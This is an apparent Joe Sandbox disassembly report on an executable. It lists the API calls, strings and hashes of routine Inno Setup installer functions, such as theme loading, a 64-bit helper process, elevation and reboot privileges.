                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2962429428-0
                                                                                                            • Opcode ID: 8a7e85c26bba006a24699feaad57dd478220a7a6e3331b9edb59fbcda9639b9f
                                                                                                            • Instruction ID: 073c3129693101c5e7833b7ffa09eca8aa7a1e81ff9bb2ce6bcaaab03392c7d4
                                                                                                            • Opcode Fuzzy Hash: 8a7e85c26bba006a24699feaad57dd478220a7a6e3331b9edb59fbcda9639b9f
                                                                                                            • Instruction Fuzzy Hash:
                                                                                                            APIs
                                                                                                              • Part of subcall function 0044AE58: GetVersionExA.KERNEL32(00000094), ref: 0044AE75
                                                                                                            • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044EFC9,004970B6), ref: 0044AED3
                                                                                                            • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044AEEB
                                                                                                            • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044AEFD
                                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044AF0F
                                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044AF21
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF33
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF45
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044AF57
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044AF69
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044AF7B
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044AF8D
                                                                                                            • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044AF9F
                                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044AFB1
                                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044AFC3
                                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044AFD5
                                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044AFE7
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044AFF9
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B00B
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B01D
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B02F
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B041
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B053
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B065
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B077
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B089
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B09B
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B0AD
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B0BF
                                                                                                            • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B0D1
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B0E3
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B0F5
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B107
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B119
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B12B
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B13D
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B14F
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B161
                                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B173
                                                                                                            • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B185
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B197
                                                                                                            • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B1A9
                                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B1BB
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B1CD
                                                                                                            • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B1DF
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B1F1
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B203
                                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B215
                                                                                                            • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B227
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$LibraryLoadVersion
                                                                                                            • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                                                            • API String ID: 1968650500-2910565190
                                                                                                            • Opcode ID: 58a82c8a34365b473289e4af6432c949e3c28b1c5dfbf877b155a0c5010eab07
                                                                                                            • Instruction ID: a412a743d8d6f7d45af61582fe4c6e78a33dc70606a22357c48ac29c98de50d6
                                                                                                            • Opcode Fuzzy Hash: 58a82c8a34365b473289e4af6432c949e3c28b1c5dfbf877b155a0c5010eab07
                                                                                                            • Instruction Fuzzy Hash: 5991C9B0640B50EBEF00EFF598C6A2A36A8EB15B14714457BB444EF295D778C814CF9E
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00457D4F
                                                                                                            • QueryPerformanceCounter.KERNEL32(02133858,00000000,00457FE2,?,?,02133858,00000000,?,004586DE,?,02133858,00000000), ref: 00457D58
                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(02133858,02133858), ref: 00457D62
                                                                                                            • GetCurrentProcessId.KERNEL32(?,02133858,00000000,00457FE2,?,?,02133858,00000000,?,004586DE,?,02133858,00000000), ref: 00457D6B
                                                                                                            • CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 00457DE1
                                                                                                            • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,02133858,02133858), ref: 00457DEF
                                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00498AF0,00000003,00000000,00000000,00000000,00457F9E), ref: 00457E37
                                                                                                            • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,00457F8D,?,00000000,C0000000,00000000,00498AF0,00000003,00000000,00000000,00000000,00457F9E), ref: 00457E70
                                                                                                              • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
                                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00457F19
                                                                                                            • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 00457F4F
                                                                                                            • CloseHandle.KERNEL32(000000FF,00457F94,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00457F87
                                                                                                              • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                                                            • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                                                            • API String ID: 770386003-3271284199
                                                                                                            • Opcode ID: 9bc676f9c34af54fa9c79b55e27a3e393b90950002bff594f479ab37992d8959
                                                                                                            • Instruction ID: c70edaa48864fe3754a193870ded2551bb9409a03b77fa183b8e4c23b8ad21c8
                                                                                                            • Opcode Fuzzy Hash: 9bc676f9c34af54fa9c79b55e27a3e393b90950002bff594f479ab37992d8959
                                                                                                            • Instruction Fuzzy Hash: 66712270A043449EDB10DB69DC45B9EBBF5AB05705F1084BAF908FB283DB7859488F69
                                                                                                            APIs
                                                                                                              • Part of subcall function 00476E18: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02132BD8,?,?,?,02132BD8,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E31
                                                                                                              • Part of subcall function 00476E18: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00476E37
                                                                                                              • Part of subcall function 00476E18: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02132BD8,?,?,?,02132BD8,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E4A
                                                                                                              • Part of subcall function 00476E18: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02132BD8,?,?,?,02132BD8), ref: 00476E74
                                                                                                              • Part of subcall function 00476E18: CloseHandle.KERNEL32(00000000,?,?,?,02132BD8,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E92
                                                                                                              • Part of subcall function 00476EF0: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00476F82,?,?,?,02132BD8,?,00476FE4,00000000,004770FA,?,?,-00000010,?), ref: 00476F20
                                                                                                            • ShellExecuteEx.SHELL32(0000003C), ref: 00477034
                                                                                                            • GetLastError.KERNEL32(00000000,004770FA,?,?,-00000010,?), ref: 0047703D
                                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 0047708A
                                                                                                            • GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 004770AE
                                                                                                            • CloseHandle.KERNEL32(00000000,004770DF,00000000,00000000,000000FF,000000FF,00000000,004770D8,?,00000000,004770FA,?,?,-00000010,?), ref: 004770D2
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
                                                                                                            • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                                                            • API String ID: 883996979-221126205
                                                                                                            • Opcode ID: cdfc9ed65273480b993f908da37bc8b157bd69d2ac5039e997c7e7ab6857fd80
                                                                                                            • Instruction ID: 1ba95e0e0868ac7cc54db30065146fef24764d75c8f79a60f30d4c8031701125
                                                                                                            • Opcode Fuzzy Hash: cdfc9ed65273480b993f908da37bc8b157bd69d2ac5039e997c7e7ab6857fd80
                                                                                                            • Instruction Fuzzy Hash: 6F3162B0A04648AADB10EFAAC841ADEB7B9EF05314F90843BF508F7382D77C59048B59
                                                                                                            APIs
                                                                                                            • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 00422A04
                                                                                                            • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BCE), ref: 00422A14
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSendShowWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 1631623395-0
                                                                                                            • Opcode ID: 2c26266a8c67d7a7ed143539e2fbf203b7c134ad6664bcde8bffe5e01bbb34f6
                                                                                                            • Instruction ID: 39dda2673d0f757005a7c2ebbeab04d2226afc2b16c541db07efabb99d57c27a
                                                                                                            • Opcode Fuzzy Hash: 2c26266a8c67d7a7ed143539e2fbf203b7c134ad6664bcde8bffe5e01bbb34f6
                                                                                                            • Instruction Fuzzy Hash: 8B916171B04214BFD710EFA9DA86F9D77F4AB04314F5500B6F904AB3A2CB78AE409B58
                                                                                                            APIs
                                                                                                            • IsIconic.USER32(?), ref: 004183A3
                                                                                                            • GetWindowPlacement.USER32(?,0000002C), ref: 004183C0
                                                                                                            • GetWindowRect.USER32(?), ref: 004183DC
                                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 004183EA
                                                                                                            • GetWindowLongA.USER32(?,000000F8), ref: 004183FF
                                                                                                            • ScreenToClient.USER32(00000000), ref: 00418408
                                                                                                            • ScreenToClient.USER32(00000000,?), ref: 00418413
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                                                            • String ID: ,
                                                                                                            • API String ID: 2266315723-3772416878
                                                                                                            • Opcode ID: bc370706f242ec70077bf36f1e1d3e6d0ab536e6ab9c2c39735764bf232ebbb5
                                                                                                            • Instruction ID: f1655e9c1aaa1f9d3e17845697c0dfec8ab0781743990dff6cd0a114faef5a7c
                                                                                                            • Opcode Fuzzy Hash: bc370706f242ec70077bf36f1e1d3e6d0ab536e6ab9c2c39735764bf232ebbb5
                                                                                                            • Instruction Fuzzy Hash: D6112B71505201AFDB00EF69C885F9B77E8AF49314F18067EBD58DB286D738D900CBA9
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32(00000028), ref: 00454B0F
                                                                                                            • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 00454B15
                                                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00454B2E
                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00454B55
                                                                                                            • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00454B5A
                                                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 00454B6B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                            • String ID: SeShutdownPrivilege
                                                                                                            • API String ID: 107509674-3733053543
                                                                                                            • Opcode ID: 4672a8203829a771e5d00f2c17f761bc323a5d0378d5eda1ad4e77e08b45408c
                                                                                                            • Instruction ID: 73069b54807863efa740a64668e3ddc19e7753e901194602af91027a354c2964
                                                                                                            • Opcode Fuzzy Hash: 4672a8203829a771e5d00f2c17f761bc323a5d0378d5eda1ad4e77e08b45408c
                                                                                                            • Instruction Fuzzy Hash: FDF0687068430275E610AA758C07F2B21989784B5DF50492EBE45EE1C3D7BCD44C8A6E
                                                                                                            APIs
                                                                                                            • GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045C8B1
                                                                                                            • GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045C8C1
                                                                                                            • GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045C8D1
                                                                                                            • ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047DFC7,00000000,0047DFF0), ref: 0045C8F6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$CryptVersion
                                                                                                            • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                                                                            • API String ID: 1951258720-508647305
                                                                                                            • Opcode ID: 7e27a9db68ce5781c7a285243bc6d328b0b1bffa5381604cafab58ca7bab5c59
                                                                                                            • Instruction ID: b92a23805cb6ee5c0910e5f81ef8443a356b34338ef2df7ef9b51b6282c91381
                                                                                                            • Opcode Fuzzy Hash: 7e27a9db68ce5781c7a285243bc6d328b0b1bffa5381604cafab58ca7bab5c59
                                                                                                            • Instruction Fuzzy Hash: 87F049F0901700DEDB14DF76BEC633B7695E7A8316F18803BA619A51A2D738044CCA5C
                                                                                                            APIs
                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,004966A6,?,?,00000000,0049A628,?,00496830,00000000,00496884,?,?,00000000,0049A628), ref: 004965BF
                                                                                                            • SetFileAttributesA.KERNEL32(00000000,00000010), ref: 00496642
                                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,0049667E,?,00000000,?,00000000,004966A6,?,?,00000000,0049A628,?,00496830,00000000), ref: 0049665A
                                                                                                            • FindClose.KERNEL32(000000FF,00496685,0049667E,?,00000000,?,00000000,004966A6,?,?,00000000,0049A628,?,00496830,00000000,00496884), ref: 00496678
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$AttributesCloseFirstNext
                                                                                                            • String ID: isRS-$isRS-???.tmp
                                                                                                            • API String ID: 134685335-3422211394
                                                                                                            • Opcode ID: e40fe840e367864820aded220cbe64f4e75f2107195e16c4ed2d0cc84f0cff06
                                                                                                            • Instruction ID: 7c4f1729e62c340c3776f645c08a9404eac4e90145c78096892548085370b188
                                                                                                            • Opcode Fuzzy Hash: e40fe840e367864820aded220cbe64f4e75f2107195e16c4ed2d0cc84f0cff06
                                                                                                            • Instruction Fuzzy Hash: 1A31867190161CAFDF10EF65CC51ACEBBBDDB45314F5144B7A808A32A1EA389F458E58
                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32(oleacc.dll,?,0044E8DD), ref: 0044C03F
                                                                                                            • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C050
                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C060
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                            • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                                                                            • API String ID: 2238633743-1050967733
                                                                                                            • Opcode ID: c7875b5020b1a0fc70af70b5d3619db3f858b3da6b6721b5bb5bec507322b540
                                                                                                            • Instruction ID: 768994a2e6e1f30713717b1c29876c1fd16d3b2562f205e666220538aba0b6e7
                                                                                                            • Opcode Fuzzy Hash: c7875b5020b1a0fc70af70b5d3619db3f858b3da6b6721b5bb5bec507322b540
                                                                                                            • Instruction Fuzzy Hash: BBF01CB0242701CAFB609FF5ECC672632B4E364708F18557BA0016A2E2C7BD9494CF5E
                                                                                                            APIs
                                                                                                            • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00456809
                                                                                                            • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00456830
                                                                                                            • SetForegroundWindow.USER32(?), ref: 00456841
                                                                                                            • NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,00456B19,?,00000000,00456B55), ref: 00456B04
                                                                                                            Strings
                                                                                                            • Cannot evaluate variable because [Code] isn't running yet, xrefs: 00456984
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessagePostWindow$ForegroundNtdllProc_
                                                                                                            • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                                                                            • API String ID: 2236967946-3182603685
                                                                                                            • Opcode ID: ea9aa7693e661e956a57dff5922af77563df319d7d3b4e1966ed1c34fece0d0f
                                                                                                            • Instruction ID: c3083c827e1ea9587a1b946928c79dead0c15e552dd32db2ac5f2442617c6554
                                                                                                            • Opcode Fuzzy Hash: ea9aa7693e661e956a57dff5922af77563df319d7d3b4e1966ed1c34fece0d0f
                                                                                                            • Instruction Fuzzy Hash: 6391ED34304204EFDB15DF55C961F5ABBF9EB89305F6280BAEC04A7392C639AE14CB59
                                                                                                            APIs
